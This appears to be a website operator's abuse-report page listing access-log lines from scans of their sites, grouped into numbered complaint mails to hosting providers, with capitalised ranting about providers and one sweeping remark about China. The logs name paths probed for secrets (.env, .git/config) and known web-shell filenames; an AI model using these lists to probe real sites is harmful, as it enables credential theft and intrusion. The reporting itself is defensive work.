52.178.146.4 website*x.de – – [06/Sep/2025:12:32:47 +0200] „GET /wp-load.php HTTP/1.0“ 302 – „-“ „-“

MAIL NR. 8 SATURDAY!

bucklog@proton.me,contact@proton.me,enterprise@protonmail.com,abuse@protonmail.com,

AS211590 – Bucklog SARL – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
bucklog@proton.me – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
185.177.72.21 www.website*x.de – – [06/Sep/2025:09:23:58 +0200] „GET / HTTP/1.0“ 403 – „-“ „python-httpx/0.28.1“
185.177.72.21 www.website*x.de – – [06/Sep/2025:09:23:58 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „python-httpx/0.28.1“
185.177.72.21 www.website*x.de – – [06/Sep/2025:09:23:58 +0200] „GET /.env HTTP/1.0“ 403 – „-“ „python-httpx/0.28.1“
185.177.72.21 www.website*x.de – – [06/Sep/2025:09:23:59 +0200] „GET /api/.env HTTP/1.0“ 403 – „-“ „python-httpx/0.28.1“
185.177.72.21 www.website*x.de – – [06/Sep/2025:09:23:59 +0200] „GET /config/.env HTTP/1.0“ 403 – „-“ „python-httpx/0.28.1“
185.177.72.21 www.website*x.de – – [06/Sep/2025:09:23:59 +0200] „GET /_profiler/phpinfo HTTP/1.0“ 403 – „-“ „python-httpx/0.28.1“
185.177.72.21 www.website*x.de – – [06/Sep/2025:09:23:59 +0200] „GET /tool/view/phpinfo.view.php HTTP/1.0“ 403 – „-“ „python-httpx/0.28.1“
185.177.72.21 www.website*x.de – – [06/Sep/2025:09:24:00 +0200] „GET /test.php HTTP/1.0“ 302 – „-“ „python-httpx/0.28.1“
185.177.72.21 www.website*x.de – – [06/Sep/2025:09:24:05 +0200] „GET /app_dev.php/_profiler/phpinfo HTTP/1.0“ 302 – „-“ „python-httpx/0.28.1“
185.177.72.21 www.website*x.de – – [06/Sep/2025:09:24:10 +0200] „GET /phpinfo=1 HTTP/1.0“ 403 – „-“ „python-httpx/0.28.1“
185.177.72.21 www.website*x.de – – [06/Sep/2025:09:24:10 +0200] „GET /phpinfo.php HTTP/1.0“ 302 – „-“ „python-httpx/0.28.1“
185.177.72.21 www.website*x.de – – [06/Sep/2025:09:24:16 +0200] „GET /phpinfo HTTP/1.0“ 403 – „-“ „python-httpx/0.28.1“
185.177.72.21 www.website*x.de – – [06/Sep/2025:09:24:16 +0200] „GET /info.php HTTP/1.0“ 302 – „-“ „python-httpx/0.28.1“

MAIL NR. 9 SATURDAY!

report@abuseradar.com,abuse@mbs763.kz,abuse@advinservers.com,abuse-manual@advinservers.com,support@privatelayer.com,abuse@cheapy.host

AS209854 – Cyberzone S.A. – HERE WITH 2 IP´S! – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
report@abuseradar.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
212.116.231.26 website*x.com – – [06/Sep/2025:08:22:28 +0200] „GET /manager.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0“
212.116.231.26 website*x.com – – [06/Sep/2025:08:22:28 +0200] „GET /bless.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0“
212.116.231.26 website*x.com – – [06/Sep/2025:08:22:28 +0200] „GET /O-Simple.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0“
212.116.231.26 website*x.com – – [06/Sep/2025:08:22:28 +0200] „GET /lock360.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36“
212.116.231.26 website*x.com – – [06/Sep/2025:08:22:28 +0200] „GET /zwso.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0“
212.116.231.26 website*x.com – – [06/Sep/2025:08:22:28 +0200] „GET /chosen.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)“
212.116.231.26 website*x.com – – [06/Sep/2025:08:22:28 +0200] „GET /about.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0“
212.116.231.26 website*x.com – – [06/Sep/2025:08:22:28 +0200] „GET /admin.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
212.116.231.26 website*x.com – – [06/Sep/2025:08:22:28 +0200] „GET /.well-known/login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
212.116.231.26 website*x.com – – [06/Sep/2025:08:22:28 +0200] „GET /mah.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0“
212.116.231.26 website*x.com – – [06/Sep/2025:08:22:28 +0200] „GET /fai.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36“
212.116.231.26 website*x.com – – [06/Sep/2025:08:22:28 +0200] „GET /.wp/wso.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0“
212.116.231.26 website*x.com – – [06/Sep/2025:08:22:28 +0200] „GET /core.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0“
212.116.231.26 website*x.com – – [06/Sep/2025:08:22:28 +0200] „GET /robots.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0“
212.116.231.26 website*x.com – – [06/Sep/2025:08:22:28 +0200] „GET /inputs.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36“
212.116.231.26 website*x.com – – [06/Sep/2025:08:22:28 +0200] „GET /mini.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
212.116.231.26 website*x.com – – [06/Sep/2025:08:22:28 +0200] „GET /goods.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
212.116.231.26 website*x.com – – [06/Sep/2025:08:22:28 +0200] „GET /file5.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
212.116.231.26 website*x.com – – [06/Sep/2025:08:22:28 +0200] „GET /f35.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36“
212.116.231.26 website*x.com – – [06/Sep/2025:08:22:28 +0200] „GET /simple.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36“
212.116.231.26 website*x.com – – [06/Sep/2025:08:22:28 +0200] „GET /update/f35.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0“
212.116.231.26 website*x.com – – [06/Sep/2025:08:22:28 +0200] „GET /wp-content/hello.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36“
and so on… and so on!!!
+
212.116.231.28 website*x.com – – [06/Sep/2025:08:22:30 +0200] „GET /wp-includes/class.api.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0“
212.116.231.28 website*x.com – – [06/Sep/2025:08:22:30 +0200] „GET /wp-includes/fonts/index.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0“
212.116.231.28 website*x.com – – [06/Sep/2025:08:22:30 +0200] „GET /wp-admin/chosen.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0“
212.116.231.28 website*x.com – – [06/Sep/2025:08:22:30 +0200] „GET /autoload_classmap/bypass.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
212.116.231.28 website*x.com – – [06/Sep/2025:08:22:30 +0200] „GET /dropdown.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36“
212.116.231.28 website*x.com – – [06/Sep/2025:08:22:30 +0200] „GET /images/admin.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
212.116.231.28 website*x.com – – [06/Sep/2025:08:22:30 +0200] „GET /db.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36“
212.116.231.28 website*x.com – – [06/Sep/2025:08:22:30 +0200] „GET /mah/function.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
212.116.231.28 website*x.com – – [06/Sep/2025:08:22:30 +0200] „GET /wp-content/plugins/bypass.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
212.116.231.28 website*x.com – – [06/Sep/2025:08:22:30 +0200] „GET /wp-includes/admin.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36“
212.116.231.28 website*x.com – – [06/Sep/2025:08:22:30 +0200] „GET /wp-content/themes/tflow/up.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0“
212.116.231.28 website*x.com – – [06/Sep/2025:08:22:30 +0200] „GET /wp-admin/function.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0“
212.116.231.28 website*x.com – – [06/Sep/2025:08:22:30 +0200] „GET /templates/beez3/index.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
212.116.231.28 website*x.com – – [06/Sep/2025:08:22:30 +0200] „GET /wp-admin/js/wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
212.116.231.28 website*x.com – – [06/Sep/2025:08:22:30 +0200] „GET /wp-content/edit-wolf.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36“
212.116.231.28 website*x.com – – [06/Sep/2025:08:22:30 +0200] „GET /install.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0“
212.116.231.28 website*x.com – – [06/Sep/2025:08:22:30 +0200] „GET /wp-admin/css/colors/blue/rk2.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0“
212.116.231.28 website*x.com – – [06/Sep/2025:08:22:30 +0200] „GET /images/class-config.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0“
212.116.231.28 website*x.com – – [06/Sep/2025:08:22:30 +0200] „GET /components/com_jea/views/form/tmpl/size.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
212.116.231.28 website*x.com – – [06/Sep/2025:08:22:30 +0200] „GET /templates/beez/index.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36“
212.116.231.28 website*x.com – – [06/Sep/2025:08:22:30 +0200] „GET /bypass.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
212.116.231.28 website*x.com – – [06/Sep/2025:08:22:30 +0200] „GET /class.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36“
212.116.231.28 website*x.com – – [06/Sep/2025:08:22:30 +0200] „GET /wp-admin/css/colors/light/profile.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0“

AS206216 – Advin Services LLC – VERY UNWANTED PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@advinservers.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
160.187.211.128 website*x.com – – [06/Sep/2025:09:08:10 +0200] „GET /new.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36“
160.187.211.128 website*x.com – – [06/Sep/2025:09:31:31 +0200] „GET /new.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36“
160.187.211.128 website*x.com – – [06/Sep/2025:09:57:34 +0200] „GET /ffile.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36“
160.187.211.128 website*x.com – – [06/Sep/2025:10:20:22 +0200] „GET /ffile.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36“
160.187.211.128 website*x.com – – [06/Sep/2025:10:47:12 +0200] „GET /file.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36“
160.187.211.128 website*x.com – – [06/Sep/2025:11:09:18 +0200] „GET /file.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36“
160.187.211.128 website*x.com – – [06/Sep/2025:11:37:35 +0200] „GET /abcd.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36“
160.187.211.128 website*x.com – – [06/Sep/2025:12:00:56 +0200] „GET /abcd.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36“
160.187.211.128 website*x.com – – [06/Sep/2025:12:52:11 +0200] „GET /cfile.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36“
160.187.211.128 website*x.com – – [06/Sep/2025:13:22:06 +0200] „GET /class-t.api.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36“
160.187.211.128 website*x.com – – [06/Sep/2025:13:45:29 +0200] „GET /class-t.api.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36“
160.187.211.128 website*x.com – – [06/Sep/2025:14:14:43 +0200] „GET /bolt.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36“
160.187.211.128 website*x.com – – [06/Sep/2025:14:39:06 +0200] „GET /bolt.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36“
160.187.211.128 website*x.com – – [06/Sep/2025:15:10:41 +0200] „GET /lock360.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36“
160.187.211.128 website*x.com – – [06/Sep/2025:15:34:46 +0200] „GET /lock360.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36“

AS51852 – Private Layer INC – NOW ALSO A VERY UNWANTED PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
support@privatelayer.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
179.43.191.19 website*x.com – – [06/Sep/2025:13:49:10 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://website*x.com/wp-login.php“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36“

MAIL NR. 10 SATURDAY and SUNDAY!!

info@smartlink-isp.com,abuse@ovh.net

AS210413 – Smart Link Company for Internet Service – VERY UNWANTED PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
info@smartlink-isp.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
45.157.54.24 www.website*x.de – – [06/Sep/2025:11:29:09 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“
45.157.54.24 www.website*x.de – – [06/Sep/2025:11:37:30 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“

AS16276 – OVH SAS
abuse@ovh.net
51.75.157.203 www.website*x.de – – [07/Sep/2025:13:56:37 +0200] „GET /about.php?520 HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“
51.75.157.203 www.website*x.de – – [07/Sep/2025:13:56:38 +0200] „GET /admin.php?520 HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“

MAIL NR. 11 SATURDAY!

abuse@microsoft.com, msftcs@microsoft.com, cert@microsoft.com,support@privatelayer.com,

AS51852 – Private Layer INC – NOW ALSO A VERY UNWANTED PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
support@privatelayer.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
179.43.191.19 website*x.com – – [06/Sep/2025:13:29:11 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://website*x.com/wp-login.php“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36“

MAIL NR. 12 SATURDAY!

abuse@microsoft.com, msftcs@microsoft.com, cert@microsoft.com,support@privatelayer.com,

AS51852 – Private Layer INC – NOW ALSO A VERY UNWANTED PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
support@privatelayer.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
179.43.191.19 website*x.com – – [06/Sep/2025:13:16:19 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://website*x.com/wp-login.php“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36“

MAIL NR. 13 SATURDAY!

abuse-wtt@hkbn.com.hk, hostmaster@hkbn.com.hk, abuse@namecheaphosting.com, abuse@microsoft.com, msftcs@microsoft.com, cert@microsoft.com,abuse@cyberfolks.pl

AS9381 – HKBN Enterprise Solutions HK Limited – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse-wtt@hkbn.com.hk – CHINA IS COMPLETE UNWANTED! – TO MANY HACKER-IDIOTS EVERY DAY!
218.255.162.2 website*x.com – – [06/Sep/2025:21:22:52 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36“

AS22612 – Namecheap, Inc. – VERY GOOD PROVIDER! – ALWAYS STOPS THE HACKER-IDIOTS AFTER ABUSE-MAIL FROM US!
abuse@namecheaphosting.com – ALWAYS ANSWERED ABOUT OUR ABUSE EMAILS! THIS IS VERY GOOD!
162.0.226.65 website*x.com – – [06/Sep/2025:21:28:01 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36“

AS41079 – Cyber_Folks S.A. – VERY IGNORANT PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@cyberfolks.pl – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
2a02:1778::113:d0 website*x.com – – [06/Sep/2025:22:36:11 +0200] „POST /xmlrpc.php HTTP/1.0“ 302 20 „https://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5“
2a02:1778::113:d0 website*x.com – – [06/Sep/2025:23:16:18 +0200] „POST /xmlrpc.php HTTP/1.0“ 302 20 „https://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:126.0) Gecko/20100101 Firefox/126.0“

SONNTAG

MAIL NR. 14 SUNDAY!

abuse@microsoft.com, msftcs@microsoft.com, cert@microsoft.com,reports@magnates.co.za,abuse@krystal.uk

AS8075 – Microsoft Corporation – HERE WITH 2 IP´S! – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@microsoft.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT! – ABUSE PER EMAIL IS STANDARD!!!
4.185.125.112 website*x.com – – [07/Sep/2025:00:14:33 +0200] „GET /dropdown.php HTTP/1.0“ 302 – „-“ „-“
4.185.125.112 website*x.com – – [07/Sep/2025:00:14:34 +0200] „GET /makeasmtp.php HTTP/1.0“ 302 – „-“ „-“
4.185.125.112 website*x.com – – [07/Sep/2025:00:14:34 +0200] „GET /wp-sigunq.php HTTP/1.0“ 302 – „-“ „-“
4.185.125.112 website*x.com – – [07/Sep/2025:00:14:34 +0200] „GET /wso112233.php HTTP/1.0“ 302 – „-“ „-“
4.185.125.112 website*x.com – – [07/Sep/2025:00:14:34 +0200] „GET /alfanew.php HTTP/1.0“ 302 – „-“ „-“
4.185.125.112 website*x.com – – [07/Sep/2025:00:14:34 +0200] „GET /fw.php HTTP/1.0“ 302 – „-“ „-“
4.185.125.112 website*x.com – – [07/Sep/2025:00:14:34 +0200] „GET /install.php HTTP/1.0“ 302 – „-“ „-“
4.185.125.112 website*x.com – – [07/Sep/2025:00:14:35 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „-“
4.185.125.112 website*x.com – – [07/Sep/2025:00:14:35 +0200] „GET /chosen.php HTTP/1.0“ 302 – „-“ „-“
4.185.125.112 website*x.com – – [07/Sep/2025:00:14:35 +0200] „GET /simple.php HTTP/1.0“ 302 – „-“ „-“
4.185.125.112 website*x.com – – [07/Sep/2025:00:14:35 +0200] „GET /inputs.php HTTP/1.0“ 302 – „-“ „-“
4.185.125.112 website*x.com – – [07/Sep/2025:00:14:35 +0200] „GET /classsmtps.php HTTP/1.0“ 302 – „-“ „-“
4.185.125.112 website*x.com – – [07/Sep/2025:00:14:35 +0200] „GET /wp-blog-header.php HTTP/1.0“ 302 – „-“ „-“
4.185.125.112 website*x.com – – [07/Sep/2025:00:14:36 +0200] „GET /wp-trackback.php HTTP/1.0“ 302 – „-“ „-“
4.185.125.112 website*x.com – – [07/Sep/2025:00:14:36 +0200] „GET /wp-signup.php HTTP/1.0“ 302 – „-“ „-“
4.185.125.112 website*x.com – – [07/Sep/2025:00:14:36 +0200] „GET /wp-comments-post.php HTTP/1.0“ 302 – „-“ „-“
4.185.125.112 website*x.com – – [07/Sep/2025:00:14:36 +0200] „GET /wp-cron.php HTTP/1.0“ 302 – „-“ „-“
4.185.125.112 website*x.com – – [07/Sep/2025:00:14:36 +0200] „GET /wp-load.php HTTP/1.0“ 302 – „-“ „-“
4.185.125.112 website*x.com – – [07/Sep/2025:00:14:36 +0200] „GET /wp-mail.php HTTP/1.0“ 302 – „-“ „-“
4.185.125.112 website*x.com – – [07/Sep/2025:00:14:37 +0200] „GET /edit.php HTTP/1.0“ 302 – „-“ „-“
4.185.125.112 website*x.com – – [07/Sep/2025:00:14:37 +0200] „GET /wp-activate.php HTTP/1.0“ 302 – „-“ „-“
4.185.125.112 website*x.com – – [07/Sep/2025:00:14:37 +0200] „GET /plugins.php HTTP/1.0“ 302 – „-“ „-“
4.185.125.112 website*x.com – – [07/Sep/2025:00:14:37 +0200] „GET /post.php HTTP/1.0“ 302 – „-“ „-“
4.185.125.112 website*x.com – – [07/Sep/2025:00:14:37 +0200] „GET /admin.php HTTP/1.0“ 302 – „-“ „-“
4.185.125.112 website*x.com – – [07/Sep/2025:00:14:38 +0200] „GET /about.php HTTP/1.0“ 302 – „-“ „-“
… and so on… and so on…!!!
+
52.187.45.15 website*x.com – – [07/Sep/2025:22:46:04 +0200] „HEAD /wordpress HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
52.187.45.15 website*x.com – – [07/Sep/2025:22:46:05 +0200] „HEAD / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
52.187.45.15 website*x.com – – [07/Sep/2025:22:46:05 +0200] „HEAD /wp HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
52.187.45.15 website*x.com – – [07/Sep/2025:22:46:05 +0200] „HEAD /bc HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
52.187.45.15 website*x.com – – [07/Sep/2025:22:46:05 +0200] „HEAD /bk HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
52.187.45.15 website*x.com – – [07/Sep/2025:22:46:06 +0200] „HEAD /backup HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
